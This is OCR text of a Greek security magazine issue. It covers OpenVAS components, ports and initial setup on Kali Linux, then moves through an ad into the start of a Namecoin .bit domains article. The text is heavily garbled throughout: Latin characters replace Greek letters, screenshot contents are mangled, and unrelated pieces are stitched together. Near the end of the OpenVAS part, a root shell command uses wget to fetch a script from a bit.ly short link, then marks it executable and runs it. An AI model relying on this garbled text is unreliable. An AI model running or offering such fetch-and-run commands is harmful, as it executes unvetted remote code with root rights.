δουλειά. Ξεκινώντας ano την τοπικὴ συλλογή NVTs, η οποία, παρεμπιπτόντως, 
εἶναι δυνατὸν να ενημερώνεται καθημερινά anó το Διαδίκτυο, ψάχνει για πάσης 
φύσεως αδυναμίες στα μηχανήματα που του ζητείται να ελἐγχει. H επικοινωνία 
µε τον OpenVAS Scanner γίνεται μέσω του πρωτοκόλλου OpenVAS Transfer 
Protocol (OTP) και εἶναι κρυπτογραφημένη κατὰ SSL (http://en.wikipedia. 
org/wiki/Secure_Sockets_Layer). Εξ ορισμού, ο Scanner ακούει για αιτήσεις πε- 
AaT@v ano ro port 9391 της διεύθυνσης rou loopback interface. 


e OpenVAS Manager (openvasmd). Τα αποτελέσµατα rou Scanner ra παίρνει 
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και ra διαχειρἰζεται o Manager, ο οποίος τα αποθηκεύει σε uia σχεσιακἠ βάση 
δεδοµένων της SQLite (http://en.wikipedia.org/wiki/SQLite). Στην ἴδια βάση 
αποθηκεύονται και οι ρυθμίσεις των χρηστών του συστήματος. O Manager 
εἶναι αυτός που μιλά απευθείας µε rov Scanner (µέσω OTP) και εἶναι σε θέση 
να ζητά την εκτέλεση εργασιών ανίχνευσης (σύμφωνα µε κἄποιον Χρονοπρο- 
γραμματισμὀ ἡ ὀχι), καθὼς και τον τερματισμὀ, την παύση ἡ/και την επανεκ- 
Kivnon τους. Χωρίς Tov Manager ro OpenVAS θα εξακολουθούσε να εἶναι ἑνας 
vulnerability scanner, ωστόσο δεν θα siye, n.x., τη δυνατότητα διαχείρισης των 
αδυναμιών, των false positives, των σημειώσεων και των προτιμήσεων των 
χρηστών κ.ο.κ. Επίσης, δεν θα μπορούσε να παράγει αναφορὲς σε διάφορα 


Θ 09.’ ο security Assist x \ à κ 
€ > C  & https://10.20.30.100:9392 /omp?cmd=get_config&config_id=708f25c4-7489-1 1df-8094-002264764cea&filter=rowsX... v? = 


Greenbone Logged in as Admin ovasadmin | Logout 


v Security Assistant Fri Jan 31 17:19:42 2014 EET 


ScanManagement Asset Management SecInfo Management Configuration Extras Administration Help 


Scan Config Detaiis AAS SE 


Name: Full and very deep 10: 708f25c4- 7489-1 16f-8094-002264764cea 


Comment: Most NVT's; don't trust previously collected information; slow. Created: Tue Jan 28 19:44:02 2014 
Last Modified: Tue Jan 28 19:44:02 2014 


Network Vulnerability Test Families 


AIX Local Security Checks 1of1 
Brute force attacks 8of8 


Buffer overflow 488 of 488 
cisco 14 of 14 
CentOS Local Security Checks 2041 of 2041 
Compliance 4of4 
mU". 112 of 112 
Debian Local Security Checks — [1 2880 of 2880 > 
Default Accounts 64 of 64 
Denial of Service 863 of 863 
FTP 167 of 167 
Fedora Local Security Checks 7179 of 7179 
Finger abuses 6of6 
Firewalls 20 of 20 
FreeBSD Local Security Checks 2009 of 2009 
Gain a shell remotely 89 of 89 
General 2022 of 2022 
Gentoo Local Security Checks 1728 of 1728 
HP-UX Local Security Checks 242 of 242 
IT-Grundschutz 101 of 101 
IT-Grundschutz-10 91 of 91 
IT-Grundschutz-11 102 of 102 
IT-Grundschutz-12 85 of 85 
Mac OS X Local Security Checks 66 of 66 
Malware 42 of 42 
Mandrake Local Security Checks 2092 of 2092 
Netware 8 of 8 
Nmap NSE 154 of 154 
Nmap NSE net 176 of 176 


ΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒ 


Peer-To-Peer File Sharing 21 of 21 


Μερικὲς ano τις οικογένειες NVTs (Network Vulnerability Tests) που περιλαμβάνει ro προκα- 
θορισμένο scan config ovóuari "Full and very deep", Tou OpenVAS. Παρατηρήστε ro τεράστιο 
πλήθος των local security checks yia ro Debian Linux! O συνολικὀς αριθµός NVTs τη στιγµή 
που γράφεται ro napóv, πλησιάζει τις 34 χιλιάδες. 
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formats, ónoc, n.x., σε HTML, PDF, XML k.d. Όλα αυτά τα κάνει o Manager 
και µε τον Scanner μιλὰ μέσω OTP. Γνωρίζει επίσης kal το OpenVAS Manager 
Protocol (OMP), µέσω του οποίου επικοινωνεἰ µε διάφορους πελάτες (clients) 
όπως o Greenbone Security Assistant, το Greenbone Security Desktop (έχει 
σταματήσει ν' αναπτύσσεται) και το omp (όλα πεζὰ) yia τη γραμμὴ εντολών. 
Το πρωτόκολλο OMP βασίζεται στην XML και εἶναι αυτό που λέμε stateless 
(http://en.wikipedia.org/wiki/Stateless protocol). Σημειώνεται ὅτι η επικοι- 
νωνία των πελατών µε rov Manager, πάντα μέσω OMP, κρυπτογραφείται κατὰ 
SSL (όπως ακριβώς συμβαίνει και µε την εικοινωνἰα μεταξὺ Manager-Scanner, 
μέσω OTP). Εξ ορισμού, o Manager ακούει για αιτήσεις πελατών απὀ το port 
9390 της διεύθυνσης rou loopback interface. Εἶναι δυνατὸν να ρυθµιστεἰ WOTE 
v' ακούει και σε άλλες διευθύνσεις, ἄλλων network interfaces. 


e OpenVAS Adminitrator (openvasad). Ευθύνη rou Administrator εἶναι η δι- 
αχεἰριση των χρηστών καθώς και των feeds της εφαρμογἠς (βλ. και άρθρο στη 
σελίδα 42). H επικοινωνία pači του γίνεται µέσω του OpenVAS Administrator 
Protocol (OAP) και εἶναι κρυπτογραφημένη κατά SSL. Τι πληροφορίες για 


@ O O | 4 Greenbone security Assist κ. κ 


€ > C & hetps://10.20.30.100:9392/omp?cmd=get_config_family&config_id=708f25c4-7489-11df-8094-002264764cea&name... y? = 


Greenbone Logged in as Admin ovasadmin | Logout 


DP Security Assistant 


Fri Jan 31 17:20:38 2014 EET 


Scan Management Asset Management SecInfo Management Configuration Extras Administration Heip 
Scan Config Family Details @ 
Config Details 


Config: Full and very deep 
Family: Firewalls 


Network Vulnerability Tests 


Arkoon identification 


[sx | cvss [Timeout [rete [Acto | 


1.3.6.1.4.1.25623.1.0.14377 None 0.0 default a 
1.3.6.1.4.1.25623.1.0.16363 Med 5.0 default 
1.3.6.1.4.1.25623.1.0.10675 Med 5.0 default 
1.3.6.1.4.1.25623.1.0.10676 Med 5.0 default 


BlueCoat ProxySG console management detection 
CheckPoint Firewall-1 Telnet Authentication Detection 
CheckPoint Firewall-1 Web Authentication Detection 
Checkpoint Firewall open Web adminstration 1.3.6.1.4.1.25623.1.0.11518 Med 4.3 default 
1.3.6.1.4.1.25623.1.0.10710 Med 5.0 default 
1.3.6.1.4.1.25623.1.0.10617 Low 1.2 default 


1.3.6.1.4.1.25623.1.0.80096 Med 5.0 default 


Checkpoint SecuRemote information leakage 
Checkpoint SecureRemote detection 
Checkpoint VPN-1 PAT information disclosure 


Total: 20 


Firewall ECE-bit bypass 1.3.6.1.4.1.25623.1.0.12118 High 7.5 default 
Firewall Enabled 1.3.6.1.4.1.25623.1.0.80059 None 0.0 default 
HTTP Proxy Server Detection 1.3.6.1.4.1.25623.1.0.100083 None 0.0 default 
Kerio WinRoute Firewall HTTP/HTTPS Management Detection 1.3,6.1.4.1.25623.1.0.20225 Med 5.0 default 
Kerio personal Firewall buffer overflow 1.3.6.1.4.1.25623.1.0.11575 High 7.5 default 
NetAsq identification 1.3.6.1.4.1.25623.1.0.14378 None 0.0 default 
Raptor FW version 6.5 detection 1,3,6.1.4.1.25623.1.0.10730 Med 5.0 default 
Source routed packets 1.3.6.1.4.1.25623.1.0.11834 Med 3.3 default 
Squid information-disclosure vulnerability 1.3.6.1.4.1.25623.1.0.100147 High 5.8 default 
StoneGate client authentication detection 1.3.6.1.4.1.25623.1.0.11762 None 0.0 default 
ZoneAlarm Personal Firewall port 67 flaw 1.3.6.1.4.1.25623.1.0.14660 High 7.5 default 
ZoneAlarm Pro local DoS 1.3,6.1.4.1.25623.1.0.14726 Low 1.9 default 


ΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΒΕΒ 


Greenbone Security Assistant (GSA) Copyright 2009-2013 by Greenbone Networks GmbH, www.greenbone.net 


Ta NVTs της οικογένειας "Firewalls". 
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9 O O // & Greenbone security Assist x VL 
€ — C | & https://10.20.30.100:9392/omp?cmd=get_config_nvt&oid=1.3.6.1.4.1.25623.1.0.900091&config_id=708f25c4-7489-... “οὶ ΕὮ 


Greenbone Logged in as Admin ovasadmin | Logout 


2 Security Assistant Fri Jan 31 17:22:08 2014 EET 


Scan Management Asset Management SecInfo Management Configuration Administration Help 


Scan Config NVT Details @ 4 


Config Family Details 


Config: Full and very deep 
Family: Malware 


Network Vulnerability Test 
Details 


Name:  Conficker Detection 1D: 1.3.6.1.4.1.25623.1.0.900091 
Family: Malware Last modified: Sun Oct 27 14:49:54 2013 


OID: 1.3.6.1.4.1.25623.1.0.900091 ο ο = 
Version: $Revision: 15 $ 

Notes: 0 

Overrides: 0 

Summary 

This host seems to be contaminated with infectious Conficker Worm. 

Affected Software/OS 

Microsoft Windows 2K Service Pack 4 and prior. Microsoft Windows XP Service Pack 3 and prior. Microsoft Windows 2003 Service Pack 2 and prior. 
Vulnerability Scoring 


CVSS base: 10.0 
Risk factor: Critical 
CVSS base vector: AV:N/AC:L/Au:N/C:C/I:C/A:C 


Vulnerability Insight 


Conficker is a worm that spreads on Windows Platforms. This malware could spread Windows file shares protected with weak passwords or to which 
à logged on domain administrator has access, by copying itself to removable storage devices and by exploiting the MS08-067 Windows Server service 
vulnerability. This malware generates infections files to set up to run as a service and also using a random name when Windows starts under 
system32, registry entries so that they are not visible to the user. Such registry entries are under, 
IKLMYSO 


Αναλυτικὲς πληροφορίες για éva NVT ano την οικογένεια 
"Malware", αποστολή rou οποίου εἶναι ο εντοπισμός TOU 
Conficker worm σε Windows hosts. 


τους χρήστες αλλά και για ra feeds, o Administrator τις αποθηκεύει στην ἴδια 
βάση SQLite που χρησιμοποιεί κι ο Manager. Εξ ορισμού, ο Manager ακούει για 
αιτήσεις πελατών anó το port 9393 της διεύθυνσης του loopback interface. 
Εἶναι δυνατὸν να ρυθμιστεί ώστε v' ακούει και σε ἄλλες διευθύνσεις, ἄλλων 
network interfaces. H πλέον πρὀσφατη, σταθερἠ ἐκδοση του OpenVAS, εἶναι 
η 6. Ano την ἐκδοση 7 και µετά --προς το παρὀν εἰμαστε στην 7 beta3—, oi 
λειτουργίες Tou Administrator ενσωματώνονται στο σύνολο λειτουργιών του 
Manager. Στο deltaCast 502601 και στα σχετικἁ άρθρα του παρόντος τεύχους, 
εστιάζουµε στην ἐκδοση 6. 


e Greenbone Security Assistant (GSA, gsad). Πρόκειται για £vav ΟΜΡ client 
που παρέχει στο χρήστη του OpenVAS ἑνα εὐχρηστο web interface ἡ αλλιώς 
web panel, χάρη στο οποίο εκείνος εἶναι σε θέση να δουλεύει άνετα µε την 
πλατφόρμα — φυσικά ano τον αγαπημένο του web browser. To panel σερβἰ- 
ρεται µέσω του μικρού web server (micro-httpd) που ενσωματώνει ο GSA, 
EVO η μετάφραση των απαντήσεων του OMP σε HTML γίνεται µε χρήστη XSLT 
(http://en.wikipedia.org/wiki/XSL_Transformations). Εξ ορισμού, ο GSA ακούει 
για αιτήσεις πελατών απὀ το port 9392 της διεύθυνσης του loopback interface. 
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Εἶναι βέβαια δυνατόν va ρυθµιστεἰ WOTE ν' ακούει και σε ἄλλες διευθύνσεις, 
ἄλλων network interfaces. 


Γνωριμία pe ra NVTs 


Ὅπως εἶπαμε και προηγουμένως, προκειμένου ro OpenVAS να εντοπίζει αδυναμίες 
κάνει χρήση των λεγόμενων Network Vulnerability Tests ἡ anAd NVTs. Πρόκειται για 
scripts γραμμένα σε NASL [Nessus Attack Scripting Language, http://en.wikipedia. 
org/wiki/Nessus (software)] κι αυτό που κάνει το καθένα εἶναι να υποβάλλει σε pia 
η περισσὀτερες δοκιμασίες Eva σύστημα ἡ μία υπηρεσία. Τη στιγμὴ που γράφεται TO 
παρὸν, το πλήθος των NVTs πλησιάζει τις 34 χιλιάδες. Εἶναι οργανωμένα σε OIKOYE- 
νειες και µια ιδέα για To τι διατίθεται μπορούμε να πάρουμε μέσα ano το web panel 
του GSA (δώστε SecInfo Management > NVTs). Ενδεικτικἁ αναφέρουμε οικογένειες 
NVTs για brute force attacks, buffer overflows, web/FTP/SSH server vulnerabilities, 
local exploits για διάφορα A&rroupyikà συστήματα κ.ο.κ. Ένας άλλος τρὀπος yia va 
εκτιμήσουμε την ευρύτητα των NVTs, εἶναι να δούµε τις οικογένειες που συµπερι- 
λαμβάνει κάποιο ano τα προκαθορισµένα scan configs. And To web panel του GSA, 
δώστε Configuration > Scan Configs και κάντε κλικ, π.χ., στο Full and very deep. Με 
κλικ στο μεγεθυντικὀ φακό µιας οικογένειας, βλέπουμε Ta NVTs nou περιλαμβάνει. 
Με κλικ στο μεγεθυντικὀ φἀάκο ενὸς οποιουδήποτε NVT, διαβάζουμε αναλυτικἁ για 
το τι ακριβώς κάνει. 


Applications Places  [] Fri Jan 31, 7:13 PM 


root@kali64: ~ 


File Edit View Search Terminal Help 
zyxel_http_pwd.nasl. asc 

zyxel_pwd. nasl 

zyxel_pwd. nasl. asc 

[i] Download c le 

[i] Checking dir: 

[i] Checking MD5 

Generating RSA pr e , 1024 bit long modulus 


hon RR 
le is (0x10001) 

You are about to be asked to enter information that will be incorporated 
into your certificate request. 

hat you are about to enter is what is called a Distinguished Name or a DN, 
There are quite a few fields but you can leave some blank 

For some fields there will be a default value, 

If you enter '.', the field will be left blank, 


Country Name (2 letter code) [DE]:State or Province Name (full name) [Some-State]:Locality Name (eg, city) []:0rganization Name (eg, company 
) [Internet Widgits Pty Ltd]:O0rganizational Unit Name (eg, section) []:Common Name (eg, your name or your server's hostname) []:Email Addres 
s [1:Using configuration from /tmp/openvas-mkcert-client, 3627/stdC, cnf 
Check that the request matches the signature 
Signature ok 
The Subject's Distinguished Name is as follows 
: PRINTABLE: d 
: PRINTABL 
: PRINTABLE : 'om' 
Kertificate is to be certified until Jan 31 17:05:20 2015 GMT (365 days) 


rite out database with 1 new entries 
Data Base Updated 
User om added to OpenVAS. 


Stopping OpenVAS Manager: openvasmd. 

Stopping OpenVAS Scanner: openvassd. 

loading the OpenVAS plugins...base gpgme-Message: Setting GnuPG homedir to '/etc/openvas/gnupg' 

base gpgme-Message: Using OpenPGP engine version '1.4.12" 

ALL plugins loaded 

ind — main: WARNING: 7170: 2014-01-31 19h10.02 EET: sql x: sqlite3 prepare failed: no such table: main.meta 
Starting OpenVAS Scanner: openvassd. 

Starting OpenVAS Manager: openvasmd. 

Restarting OpenVAS Administrator: openvasad. 

Restarting Greenbone Security Assistant: gsad. 

Enter password: 

lad main:MESSAGE:7227:2014-01-31 19h13.29 EET: No rules file provided, the new user will have no restrictions. 
ad — main:MESSAGE:7227:2014-01-31 19h13.29 EET: User admin has been successfully created. 

root&kali64: -+ β 


E root@kali64: - 


H αρχική ρύθμιση του OpenVAS στο Kali Linux συμπεριλαμβάνει ro κατέβασμα της 
συλλογής µε ra NVTs, καθώς και τη δημιουργία ενός χρήστη yia την εφαρµογή, ο 
οποίος ἐχει δικαιώµατα διαχειριστή. 
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Ρύθμιση του OpenVAS στο Kali Linux 


Κατὰ rnv παρουσίαση rou OpenVAS στο deltaCast s02e01 εργαζόμασταν ano το 
περιβάλλον Tou BackBox Linux. H αρχική ρύθμιση του OpenVAS επιτυγχάνεται 
µε διαφορετικὀ τρόπο oro BackBox, σε σύγκριση µε ro Kali. Μιας και το npoava- 
φερθὲν αποτελεἰ αναντίρρητα την πλέον δημοφιλή διανομή yia pen-testing, και 
µε δεδομένο ὁτι η ρύθμιση του OpenVAS μόνο ως προφανἠς ἡ οµαλἠ διαδικασία 
δεν µπορεί να χαρακτηριστεί, στρἐφουµε τώρα την προσοχὴ µας oro Kali Linux. 
Παρουσιάζουµε την όλη διαδικασία ρύθμισης του OpenVAS σε επιµέρους βήματα. 


Applications Places & Fri Jan 31, 7:17 PM ΓΝ ἘΠῚ 


root@kali64: ~ 


File Edit View Search Terminal Help 


root@kali64:~# openvas-check-setup 
lopenvas-check-setup 2.2.3 

Test completeness and readiness of OpenVAS-6 

(add '--v4', '--v5' or '--v7* 

if you want to check for another OpenVAS version) 


Please report us any non-detected problems and 
help us to improve this check routine: 
http: //lists.wald.intevation.org/mailman/listinfo/openvas-discuss 


Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the problem. 


Use the parameter --server to skip checks for client tools 
like GSD and OpenVAS-CLI, 


Step 1: Checking OpenVAS Scanner ... 
OK: OpenVAS Scanner is present in version 3.4.0. 
OK: OpenVAS Scanner CA Certificate is present as /var/lib/openvas/CA/cacert.pem. 
OK: NVT collection in /var/lib/openvas/plugins contains 33927 NVTs. 
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner. 
SUGGEST: Enable signature checking (see http://www. openvas. org/trusted-nvts. html). 
OK: The NVT cache in /var/cache/openvas contains 33927 files for 33927 NVTs. 
: Checking OpenVAS Manager ... 
OK: OpenVAS Manager is present in version 4.0.4. 
: OpenVAS Manager client certificate is present as /var/lib/openvas/CA/clientcert.pem, 
: OpenVAS Manager database found in /var/lib/openvas/mgr/tasks.db. 
+ Access rights for the OpenVAS Manager database are correct, 
i extended checks of the OpenVAS Manager installation enabled, 
t revision 74, 
se at revision 74. 
: Database 
+ OpenVAS Manager database contains information about 33927 NVTs. 
ERROR: No OpenVAS SCAP database found. (Tried: /var/lib/openvas/scap-data/scap.db) 
FIX: Run a SCAP synchronization script like openvas-scapdata-sync or greenbone-scapdata-sync. 


ERROR: Your OpenVAS-6 installation is not yet complete! 


Please follow the instructions marked with FIX above and run this 
script again. 


If you think this result is wrong, please report your observation 

and help us to improve this check routine: 

http: //lists.wald.intevation.org/mailman/listinfo/openvas-discuss 

Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the p 


root&kali64: ~# β Click to switch to "Workspace 2" 


E root@kali64: - 


To script μ' αυτό ro "initial setup" στ' ὀνομά TOU ἐχει ολοκληρώσει την εργασία 
του, διαπιστώνουμε ωστόσο ὀτι £xouue ακόµα OOUAEIG va κάνουμε... 


Βήμα 1. Ακολουθούμε τη διαδρομή Applications > Vulnerability Analysis ^ 
OpenVAS > openvas initial setup. Μεταξύ ἄλλων εργασιών, ro script που pò- 
λις Tp£&aue κατεβάζει Eva archive µε ὁλα ra NVTs, φτιάχνει πιστοποιητικἁ για 
την Αρχή Πιστοποίησης, τον OpenVAS Scanner και τους clients, ενεργοποιεἰ την 
υπηρεσία openvassd (η οποία φορτώνει ra plugins, δηλαδἠ ra NVTs), δημιουργεὶ 
vav χρήστη yia το OpenVAS µε ὀνομα admin και δικαιώματα διαχειριστή, EVW µας 
ζητά va ορίσουµε κι Eva password γι' αυτόν. Αν βλέπατε την κονσόλα ὁση opa 
ETPEXE TO σκριπτάκι, πολύ πιθανὸν να παρατηρήσατε κἄποια μηνύματα λάθους. 
Μην ανησυχείτε, εἶναι αναμενόμενα. 
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Βήμα 2. Σε µια νέα κονσόλα ἡ σ' aurrj που ἄνοιξε αυτόματα στο προηγούμενο 
βήμα, πληκτρολογούμε: 


root@kali64: ~# 


AuTO το script ελέγχει την εγκατάσταση rou OpenVAS και πληροφορεί για τα 
ὀποια προβλήματα συναντήσει. Θα πάρουμε μήνυμα λάθους, για εκείνη τη βάση 
SCAP που απουσιάζει. Ano το σύστημα μενού του Kali, δίνουμε Applications ^ 
Vulnerability Analysis ^ OpenVAS > openvas feed update. Στην ερώτηση 
που θα µας απευθυνθεἰ nepi migration, anavTdue καταφατικἀ. Θα χρειαστεί ap- 
κετἠ ώρα μέχρι να τελειώσει τις εργασἰες του το script που μόλις τρέξαμε — αλλά 
κι αυτό αναμενόμενο εἶναι. 


Places € [5] Fri Jan 31, 8:01PM W) 8 root 


root@kali64: ~ 


File Edit View Search Terminal Help 


OK: xsltproc found. 
: Checking OpenVAS Administrator ... 
OK: OpenVAS Administrator is present in version 1.3.2. 
OK: At least one user exists. 
OK: At least one admin user exists. 
WARNING: Your password policy is empty. 
SUGGEST: Edit the /etc/openvas/pwpolicy.conf file to set a password policy. 
: Checking Greenbone Security Assistant (GSA) 
OK: Greenbone Security Assistant is present 
: Checking OpenVAS CLI ... 
OK: OpenVAS CLI version 1.2.0. 
: Checking Greenbone Security Desktop (GSD) ... 
OK; Greenbone Security Desktop is present in Version 1.2.2. 
: Checking if OpenVAS services are up and running ... 
OK; netstat found, extended checks of the OpenVAS services enabled. 
OK: OpenVAS Scanner is running and listening only on the local interface. 
OK: OpenVAS Scanner is listening on port 9391, which is the default port. 
WARNING: OpenVAS Manager running and listening only on the local interface. This means that you will not be able to access the Op 
lenVAS Manager from the outside using GSD or OpenVAS CLI. 
SUGGEST: Ensure that OpenVAS Manager listens on all interfaces. 
OK; OpenVAS Manager is listening on port 9390, which is the default port. 
OK; OpenVAS Administrator is running and listening only on the local interface. 
OK: OpenVAS Administrator is listening on port 9393, which is the default port. 
WARNING: Greenbone Security Assistant is running and listening only on the local interface. This means that you will not be able to 
access the Greenbone Security Assistant from the outside using a web browser. 
SUGGEST: Ensure that Greenbone Security Assistant listens on all interfaces. 
OK: Greenbone Security Assistant is listening on port 9392, which is the default port. 
: Checking nmap installation ... 
WARNING: Your version of nmap is not fully supported: 6.40 
SUGGEST: You should install nmap 5.51. 
: Checking presence of optional tools ... 
: pdflatex found. 
: PDF generation successful. The PDF report format is likely to work. 
: ssh-keygen found, LSC credential generation for GNU/Linux targets is likely to work. 
: rpm found, LSC credential package generation for RPM based targets is likely to work. 
: alien found, LSC credential package generation for DEB based targets is likely to work. 
: nsis found, LSC credential package generatj@ for Microsoft Windows targets is likely to work, 


It seems like your OpenVAS-6 installation is ΟΚ. 


If you think it is not 0K, please report your observation 

and help us to improve this check routine: 

http: //lists.wald.intevation.org/mailman/listinfo/openvas-discuss 

Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem. 


E root@kali64: - 


Αφού κάνουμε OAa ὁσα απαιτούνται, το openvas-check-setup φτάνει στο 
βήμα 9 και µας ειδοποιεί ότι η εγκατάσταση του OpenVAS 6 εἶναι εντάξει. 


Βήμα 3. Τρέχουμε για άλλη µια φορά το openvas-check-setup, oore να δούμε 
πού βρισκόμαστε. Ολοκληρώνεται χωρὶς λάθη (φτάνει ἑως και το Step 9), ωστόσο 
παίρνουμε ορισμένες προειδοποιήσεις για πακέτα που λείπουν. Ta εγκαθιστούµε 


ως εξἠς: 
root@kali64: ~# 


Βήμα 4. Ανοίγουμε vav web browser (rov Iceweasel), επισκεπτόµαστε τη διεύ- 
θυνση https://127.0.0.1:9392 και μετά την προειδοποίηση nepi μη-ἐμπιστης σύν- 
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Fri Jan 31, 8:44 PM 


Greenbone Security Assistant - Iceweasel 
View Higtory Bookmarks Tools Help 
ryAssistont [| 


1270.01 
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Assistant 


5 Β 
T 


a | a ijas 
.----------- ο τη 
ae a RN 


diately s 


"-—7 
¥ aoon 


Χάρη aro εξαιρετικά απλὀ script nou γράψαμε kará την παραγωγή TOU 
deltaCast 502801 οι σχετικές µε TO OpenVAS υπηρεσίες ενεργοποιούνται 
εὐκολα και µε τη σωστή σειρά, ενώ ενημερώνεται αυτόματα και η τοπική 
συλλογή µε ra NVTs. 


δεσης, κάνουμε διαδοχικἁ κλικ στα I Understand the Risks, Add Exception και 
Confirm Security Exception. Στη σελίδα login του Greenbone Security Assistant 
θα πρέπει va εἶμαστε σε θέση va κάνουμε login ως admin, µε To password nou 
δώσαμε προηγουμένως. 


Βήμα 5. Meta ano επανεκκίνηση του λειτουργικού, οι σχετικὲς HE TO OpenVAS 
υπηρεσίες δεν θα λειτουργούν. Προκειμένου να τις ενεργοποιούµε µε τη σωστἠ 
σειρὰ αλλά και να ενημερώνουμε αυτόματα τη συλλογή µε τα NVTs, ἑνας τρόπος 
εἶναι να κατεβάσουμµε ro script που ἔχουμε φτιάξει για το deltaCast 502601 και, 
κάθε φορὰ που θέλουμε το OpenVAS, να τρέχουμε πρώτα το εν λόγω script: 


root@kali64:~# wget https://bit.ly/dcs02e010VASsh -O ~/OpenVAS.sh 
root@kali64:~# chmod 700 ~/OpenVAS.sh 
root@kali64:~# ~/OpenVAS.sh 


Σε γενικὲς γραμμές, οι εργασἰες nou επιτελεἰ το script δεν ολοκληρώνονται ypn- 
yopa. Edm εἶναι που ἑνας δίσκος SSD θα kave τη διαφορὰ! Να σημειώσουμε, 
τέλος, ότι ο OpenVAS Manager καταφεύγει στις πληροφορίες των SCAP και CERT 
feeds (βλ. και άρθρο σελ. 42). Αυτὲς μπορούμε va τις ενημερώνουμε κάθε τόσο 
χειροκίνητα, μέσα ano ro web panel του GSA (Administration ^ SCAP Feed και 
CERT Feed). EvaAAakTIkd, av το επιθυμούμε μπορούμε va καλούμε Ta scripts ονό- 
ματι openvas-scapdata-sync και openvas-certdata-sync, µέσα and To OpenVAS. 
sh. Προσοχἠ, όμως: Ta openvas-scapdata-sync και openvas-certdata-sync θα 
πρέπει να καλούνται Χαμέσως μετά” την εκτέλεση ToU openvassd (kai πριν την 
εκτέλεση TOU openvasmd --rebuild). 
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H ηλεκτρονική EKOOON του deltaHacker δεν 


EXE] καμία σχέση µε ότι έχετε δει ως τώρα. 


Είναι portable kal searchable — 


Επιτρέπει την ΚΙ ἀντιγραφῇ κειμένου, αλλά και 
την EKTUNWON. 


Είναι ve qoisrnras και δείχνει Τέλεια παντού. 
στο tablet, στο smartphone και φυσικά στον υπολογιστή, 


A! n ηλεκτρονική EKOOON του dettaHacker 


δεν φέρει τεχνητούς περιορισμούς και 
δεν τιμωρεί τον κἀτοχό της, 


Στηρίξτε τη δουλειά µας κι επιτρέψτε µας να τη 
συνεχίσουμε, 


Αποκτήστε τωρα μία απὀ τις ηλεκτρονικές 
συνδρομές στο Περιοδικό deltaHacker. 
Κι εσείς. 


http://deltahacker.gr/podf12order 


in 


Sk111: Beginner 
Tags: bitcoin, namecoin, wallet, dot bit, domain name, name server 
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=namecoin 


by GiannouG 
— κ 


Ανώνυμα domains ano ro δίκτυο του namecoin! 


Me To Bitcoin ἔχουμε ασχοληθεί αρκετὲς φορές. Προσφάτως, μάλιστα, 
σε σχετικὀ άρθρο στο τεύχος 026, εξερευνήσαμε: τις επιλογἑς για 
όσους σκοπεύουν να καταπιαστούν σοβαρά με το mining χωρίς va e 
καταξοδευτο πορούσαμε να πούμε OT! κοντεύουμε να TO 
αλήθεια ωστόσο εἶναι ότι το αγαπάμε ακόµα :D 
ικἠ περιπλάνηση, πέσαμε πάνω στο Namecoin. 
"no, ακόµη Eva ψηφιακὸ νόμισμα", όπως 
E€ µας να σας εξηγἠσουµε. Πιστεύουμε ότι 
a το αγαπήσετε *kai* αυτό, *kai* εσεῖς. 


σκέφτηκε ο 
στο TEA 


— _— 


Rvéávupga domains από to δίκτυα tou namecoin! 
ri 


Ας πάρουμε ra πράγματα ano την αρχἠ. 
Το Namecoin εἶναι ἑνα ψηφιακὀ νόμισμα. 
Όσα γνωρίζουμε γι’ αυτού του εἰδους τα 
νομίσματα, ισχύουν κι εδώ. H σχετικἠ 
ορολογία (mining, wallet, k.à.) διατη- 
peirai, χωρὶς την παραμικρή αλλαγή. To 
Namecoin στηρίζεται στον κὠδικα του 
Bitcoin, αλλά Χρησιμοποιεί διαφορετικό 
block chain (https://en.bitcoin.it/wiki/ 
Block chain) και φυσικά το δικό του δί- 
κτυο. Έτσι, το Namecoin ζει κι εξελίσσε- 
ται εντελὠς ανεξάρτητα ano To Bitcoin. 
Με το Namecoin μπορούμε va πραγµατο- 
ποιούμε αγορές, αλλά μπορούμε να Kå- 
VOUHE και κάτι που δεν γίνεται µε κανένα 
ἀλλο ψηφιακὀ νόμισμα: Μπορούμε va 
αγοράζουμε domains, μέσα στο δίκτυο 


namecoin 


"Ki GAAo cryptocurrency; Πόσα θα δούμε nia;" Δεν 
ξέρουμε, γνωρίζουμε ωστόσο ὁτι το Namecoin ἐχει 
κάτι νέο κι ενδιαφέρον να µας προσφέρει! 


του νομίσματος. Το ενδιαφἑρον στοιχείο εἶναι OT! η διαχείριση αυτών των domains 
ακολουθεί uia διαφορετικἠ Φιλοσοφία ano αυτὴν που γνωρίζουμε µε Ta "φυσιο- 
λογικά", ιντερνετικἁ domains. Avri να υπάρχει µια KEVTPIKN αρχή διαχείρισης, τα 
domains κατανέμονται μέσα ano το *avovupgo* δίκτυο του νομίσματος. H κατάλη- 
En (TLD) aurov των domains εἶναι .bit (dot-bit). Σε αυτό το ἆρθρο θα δούμε NWG 
μπορούμε να κατοχυρώσουμε τα δικἀ µας domains χρησιμοποιώντας το Namecoin, 
noc μπορούμε va τα χρησιμοποιήσουμε σαν *kavovikd* domains και, φυσικά, πὼς 
μπορούμε va επισκεπτόµαστε σελίδες που κατοικούν σ' αυτά τα domains. 


File Settings Help 


Number of transactions: 62 


4 E Send coins xl Receive coins ES] Transactions D Address Book Q) Manage Names (LS Export 


Recent transactions 


18/1/2014 14:58 

name new: d/neo-super-domain 
17/1/2014 01:19 

name. frstupdate: d amm, 


17/1/2014 00:48 
name firstupdate: d/totalxaker 


To μικρὸ και Ταπεινὀ µας πορτοφόλι. Εδώ 
φυλάσσονται όλα τα domains αλλά και 
τα NMC που έχουμε αγοράσει ή ἔχουμε 

βγάλει µε τον ιδρώτα µας ;) 
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BTC/USD )( BTC/RUR )( BTC/EUR )( LTC/BTC )( LTC/USD )( LTC/RUR )( LTC/EUR ) MOEI (νμς!υ5ο 
810.001 Jle9092.510)]L 601.5 0.02903 J|23.54871)| 845.1 17.541 0.007 17 5.8 0.01735 
USD/RUR || EUR/USD ){ TRC/ETC PPC/USD XPM/BTC 

14.049 35.76 1.3496 J| 0.00053 Jl. 0.0065 5.593 0.00037 }ἰ 0.00388 

0.0074 6,000 


nmi sis Pam t 


0.0073 | 4.500 


0.0072 3,000 


ity rt! : 1,500 


